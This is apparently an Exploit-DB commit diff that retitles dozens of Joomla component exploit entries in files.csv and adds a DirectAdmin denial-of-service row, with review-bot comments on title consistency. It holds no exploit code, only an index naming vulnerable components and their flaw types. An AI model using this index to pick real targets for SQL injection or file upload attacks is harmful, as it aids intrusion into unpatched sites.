DB: 2017-01-10

5 new exploits

DirectAdmin 1.50.1 - Denial of Service

Joomla! Component 'com_menu' - SQL Injection
Joomla! Component com_menu - SQL Injection
Joomla! Component 'com_pcchess' - Local File Inclusion
Joomla! Component 'com_huruhelpdesk' - SQL Injection
Joomla! Component com_pcchess - Local File Inclusion
Joomla! Component huruhelpdesk - SQL Injection

Joomla! Component 'com_ca' - SQL Injection
Joomla! Component com_ca - SQL Injection

Joomla! Component 'com_education_classess' - SQL Injection
Joomla! Component education - SQL Injection

Joomla! Component 'com_Flashgames' - Local File Inclusion
Joomla! Component FlashGames 1.5.0 - Local File Inclusion
Joomla! Component 'com_cvmaker' - Local File Inclusion
Joomla! Component 'com_myfiles' - Local File Inclusion
Joomla! Component CV Maker 1.0 - Local File Inclusion
Joomla! Component My Files 1.0 - Local File Inclusion
Joomla! Component 'com_joommail' - Local File Inclusion
Joomla! Component 'com_memory' - Local File Inclusion
Joomla! Component JoomMail 1.0 - Local File Inclusion
Joomla! Component Memory Book 1.2 - Local File Inclusion

Joomla! Component 'com_diary' - Local File Inclusion
Joomla! Component Digital Diary 1.5.0 - Local File Inclusion

Joomla! Component 'com_jdrugstopics' - SQL Injection
Joomla! Component com_jdrugstopics - SQL Injection

Joomla! Component 'com_flexicontent' - Local File
Joomla! Component FLEXIcontent 1.5 - Local File Inclusion

Joomla! Component 'com_delicious' - Local File Inclusion
Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion

Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection
Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection

Joomla! Component 'com_pandafminigames' - SQL Injection
Joomla! Component com_pandafminigames - SQL Injection

Joomla! Component 'com_caddy' - Exploit
Joomla! Component com_caddy - Exploit

Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload
Joomla! Component com_jesectionfinder - Arbitrary File Upload

Joomla! Component 'com_camp' - SQL Injection
Joomla! Component com_camp - SQL Injection
Joomla! Component 'com_crowdsource' - SQL Injection
Joomla! Component 'com_event' - Multiple Vulnerabilities
Joomla! Component com_crowdsource - SQL Injection
Joomla! Component com_event - Multiple Vulnerabilities

Joomla! Component 'com_event' - SQL Injection
Joomla! Component com_event - SQL Injection

Joomla! Component 'com_packages' - SQL Injection
Joomla! Component com_packages - SQL Injection

Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection
Joomla! Component JE Poll - 'pollid' Parameter SQL Injection
Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection
Joomla! Component 'com_chronocontact' - Blind SQL Injection
Joomla! Component ChronoConnectivity - Blind SQL Injection
Joomla! Component ChronoForms - Blind SQL Injection

Joomla! Component 'com_lead' - SQL Injection
Joomla! Component com_lead - SQL Injection

Joomla! Component 'com_cinema' - SQL Injection
Joomla! Component cinema - SQL Injection
Joomla! Component 'com_jstore' - SQL Injection
Joomla! Component 'com_jtickets' - SQL Injection
Joomla! Component 'com_jcommunity' - SQL Injection
Joomla! Component 'com_jmarket' - SQL Injection
Joomla! Component 'com_jsubscription' - SQL Injection
Joomla! Component com_jstore - SQL Injection
Joomla! Component com_jtickets - SQL Injection
Joomla! Component com_jcommunity - SQL Injection
Joomla! Component com_jmarket - SQL Injection
Joomla! Component com_jsubscription - SQL Injection

Joomla! Component 'com_jnewsletter' - SQL Injection
Joomla! Component com_jnewsletter - SQL Injection

Joomla! Component 'com_joomdocs' - Cross-Site Scripting
Joomla! Component com_joomdocs - Cross-Site Scripting
Joomla! Component 'com_community' - Persistent Cross-Site Scripting
Joomla! Component 'com_jomestate' - Remote File Inclusion
Joomla! Component com_community - Persistent Cross-Site Scripting
Joomla! Component com_jomestate - Remote File Inclusion

Joomla! Component 'com_jejob' - Local File Inclusion
Joomla! Component com_jejob - Local File Inclusion

Joomla! Component 'com_dateconverter' 0.1 - SQL Injection
Joomla! Component com_dateconverter 0.1 - SQL Injection

Joomla! Component 'com_phocagallery' - SQL Injection
Joomla! Component Phoca Gallery 2.7.3 - SQL Injection

Joomla! Component 'com_jpodium' - SQL Injection
Joomla! Component JPodium 2.7.3 - SQL Injection

Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection
Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection
Joomla! Component 'com_myhome' - Blind SQL Injection
Joomla! Component 'com_mysms' - Arbitrary File Upload
Joomla! Component MyHome - Blind SQL Injection
Joomla! Component MySMS - Arbitrary File Upload

Joomla! Component 'com_iproperty' - SQL Injection
Joomla! Component com_iproperty - SQL Injection

Joomla! Component 'com_itarmory' - SQL Injection
Joomla! Component com_itarmory - SQL Injection

Joomla! Component 'com_neorecruit' 1.4 - SQL Injection
Joomla! Component NeoRecruit 1.4 - SQL Injection

Joomla! Component 'com_equipment' - SQL Injection
Joomla! Component com_equipment - SQL Injection
Joomla! Component 'com_Fabrik' - SQL Injection
Joomla! Component 'com_extcalendar' - Blind SQL Injection
Joomla! Component Fabrik - SQL Injection
Joomla! Component com_extcalendar - Blind SQL Injection

Joomla! Component 'com_jejob' - SQL Injection
Joomla! Component JE Job - SQL Injection

Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload
Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload
Joomla! Component 'com_connect' - Local File Inclusion
Joomla! Component 'com_dcnews' - Local File Inclusion
Joomla! Component com_connect - Local File Inclusion
Joomla! Component com_dcnews - Local File Inclusion

Joomla! Component 'com_clan' - SQL Injection
Joomla! Component com_clan - SQL Injection

Joomla! Component 'com_clanlist' - SQL Injection
Joomla! Component com_clanlist - SQL Injection
Joomla! Component 'com_markt' - SQL Injection
Joomla! Component 'com_img' - Local File Inclusion
Joomla! Component com_markt - SQL Injection
Joomla! Component com_img - Local File Inclusion

Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities
Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities

Joomla! Component 'com_maianmedia' - SQL Injection
Joomla! Component com_maianmedia - SQL Injection

Joomla! Component 'com_idoblog' - SQL Injection
Joomla! Component com_idoblog - SQL Injection

Joomla! Component 'com_people' 1.0.0 - SQL Injection
Joomla! Component People 1.0.0 - SQL Injection

Joomla! Component 'com_people' 1.0.0 - Local File Inclusion
Joomla! Component com_people 1.0.0 - Local File Inclusion

Joomla! Component 'com_jce' - Blind SQL Injection
Joomla! Component joomlacontenteditor - Blind SQL Injection

Joomla! Component 'com_hello' - SQL Injection
Joomla! Component com_hello - SQL Injection

Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload
Joomla! Component jDownloads 1.0 - Arbitrary File Upload

Joomla! Component 'com_jesubmit' - Local File Inclusion
Joomla! Component JE Story Submit - Local File Inclusion

Joomla! Component 'com_obSuggest' - Local File Inclusion
Joomla! Component obSuggest - Local File Inclusion

Joomla! Component 'com_jdirectory' - SQL Injection
Joomla! Component com_jdirectory - SQL Injection

Joomla! Component 'com_esearch' - SQL Injection
Joomla! Component Search 3.0.0 - SQL Injection

Joomla! Component 'com_joomtouch' - Local File Inclusion
Joomla! Component JoomTouch 1.0.2 - Local File Inclusion

Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities
Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities

Joomla! Component 'com_horses' - 'id' Parameter SQL Injection
Joomla! Component com_horses - 'id' Parameter SQL Injection

Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion
Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion

Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal
Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal

Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection
Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection

Joomla! Component 'com_dirfrm' - Multiple SQL Injections
Joomla! Component com_dirfrm - Multiple SQL Injections

Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion
Joomla! Component Catalogue - SQL Injection / Local File Inclusion
Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection
Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection
Joomla! Component Jeformcr - 'id' Parameter SQL Injection
Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection

Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_classified' - SQL Injection
Joomla! Component Classified - SQL Injection

Joomla! Component 'com_frontenduseraccess' - Local File Inclusion
Joomla! Component com_frontenduseraccess - Local File Inclusion

Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection
Joomla! Component com_clan_members - 'id' Parameter SQL Injection

Joomla! Component 'com_phocadownload' - Local File Inclusion
Joomla! Component com_phocadownload - Local File Inclusion

Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection
Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection

Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection
Joomla! Component Map Locator - 'cid' Parameter SQL Injection

Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload
Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload

Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection
Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection

Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection
Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection
Joomla! Component 'com_hospital' - SQL Injection
Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection
Joomla! Component Foto - 'id_categoria' Parameter SQL Injection
Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection
Joomla! Component com_hospital - SQL Injection
Joomla! Component Controller - 'Itemid' Parameter SQL Injection

Joomla! Component 'com_newssearch' - SQL Injection
Joomla! Component com_newssearch - SQL Injection

Joomla! Component 'com_community' - 'userid' Parameter SQL Injection
Joomla! Component com_community - 'userid' Parameter SQL Injection

Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection
Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection

Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection
Joomla! Component com_expedition - 'id' Parameter SQL Injection

Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection
Joomla! Component com_br - 'state_id' Parameter SQL Injection

Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection
Joomla! Component com_caproductprices - 'id' Parameter SQL Injection

Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_br - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_full' - 'id' Parameter SQL Injection
Joomla! Component Full - 'id' Parameter SQL Injection
Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_car' - Multiple SQL Injections
Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion
Joomla! Component com_car - Multiple SQL Injections

Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload
Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload

Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection
Joomla! Component com_motor - 'cid' Parameter SQL Injection
Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection
Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection
Joomla! Component com_firmy - 'Id' Parameter SQL Injection
Joomla! Component com_crhotels - 'catid' Parameter SQL Injection

Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection
Joomla! Component com_cmotour - 'id' Parameter SQL Injection

Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection
Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection

Joomla! Component 'com_machine' - Multiple SQL Injections
Joomla! Component Machine - Multiple SQL Injections

Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload
Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload

Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload
Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload

Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload
Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload
Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component 'com_jcalpro' - SQL Injection
Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component JCal Pro Calendar - SQL Injection

Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion
Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion

Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection
Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection

Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities
Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities

Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection
Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection

Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection
Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection

Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload
Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload

Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection
Joomla! Component Inneradmission - 'index.php' SQL Injection

Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection
Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection

Joomla! Component 'com_payplans' 3.3.6 - SQL Injection
Joomla! Component com_payplans 3.3.6 - SQL Injection

Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection
Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection

Joomla! Component 'com_bt_media' - SQL Injection
Joomla! Component com_bt_media 1.0 - SQL Injection

Joomla! Component 'com_guru' - SQL Injection
Joomla! Component Guru Pro - SQL Injection

DirectAdmin 1.50.1 - Denial of Service
Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting
My Link Trader 1.1 - Authentication Bypass
My Php Dating 2.0 - 'path' Parameter SQL Injection
My Php Dating 2.0 - 'id' Parameter SQL Injection
Offensive Security 2017-01-10 05:01:19 +00:00
parent a1c336773a
commit 574c0f2df8
8 changed files with 235 additions and 132 deletions

264
files.csv

@ -5334,6 +5334,7 @@ id,file,description,date,author,platform,type,port
40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
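Review bot: the new 40996 row's description, "DirectAdmin 1.50.1 - Denial of Service", names no trigger or vector, while the neighbouring dos rows do ("'.csv' Local Denial of Service" on 40965, "Heap Overflow" on 40985). Suggest adding the affected request or parameter, or at least whether the condition is local or remote, so the entry can be triaged from files.csv without opening 40996.txt.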
@ -22784,7 +22785,7 @@ id,file,description,date,author,platform,type,port
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0
12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0
12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
@ -22854,8 +22855,8 @@ id,file,description,date,author,platform,type,port
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
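Review bot: 12124 is retitled to "huruhelpdesk", which is neither the component identifier nor a product name with a version, while 12123 on the line above keeps the com_ form (com_pcchess). Suggest either com_huruhelpdesk or the product's display name, so a search on the component directory still finds the row.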
@ -22863,7 +22864,7 @@ id,file,description,date,author,platform,type,port
12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0
12136,platforms/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0
12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0
12138,platforms/php/webapps/12138.txt,"Joomla! Component com_ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0
12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0
12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0
@ -22877,7 +22878,7 @@ id,file,description,date,author,platform,type,port
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0
12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
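Review bot: 12153 goes from 'com_education_classess' to plain "education", which drops the only string that identifies the component and leaves a generic word that will match unrelated entries. Keep the identifier (com_education_classess) in the title, or use a product name plus version as the other renames in this commit do. 12149 in the same hunk also still carries the quoted 'com_spsnewsletter' form.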
@ -22889,23 +22890,23 @@ id,file,description,date,author,platform,type,port
12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component FlashGames 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12170,platforms/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12171,platforms/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12172,platforms/php/webapps/12172.txt,"Joomla! Component CV Maker 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12173,platforms/php/webapps/12173.txt,"Joomla! Component My Files 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12175,platforms/php/webapps/12175.txt,"Joomla! Component JoomMail 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book 1.2 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12182,platforms/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12184,platforms/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
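Review bot: 12180 ('com_worldrates') and 12181 ('com_record') keep the quoted identifier form while the rows being changed around them move to a product name with version or an unquoted com_ name, so this block now mixes three title styles. Rename these two in the same pass or track them as a follow-up. The moves to display names (FlashGames 1.5.0, CV Maker 1.0, My Files 1.0, JoomMail 1.0, Memory Book 1.2, Digital Diary 1.5.0) also remove the com_ string from the description, so a search of files.csv for the component directory (for example com_cvmaker) no longer hits these rows; consider keeping the identifier alongside the name.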
@ -22934,7 +22935,7 @@ id,file,description,date,author,platform,type,port
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
@ -22945,14 +22946,14 @@ id,file,description,date,author,platform,type,port
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
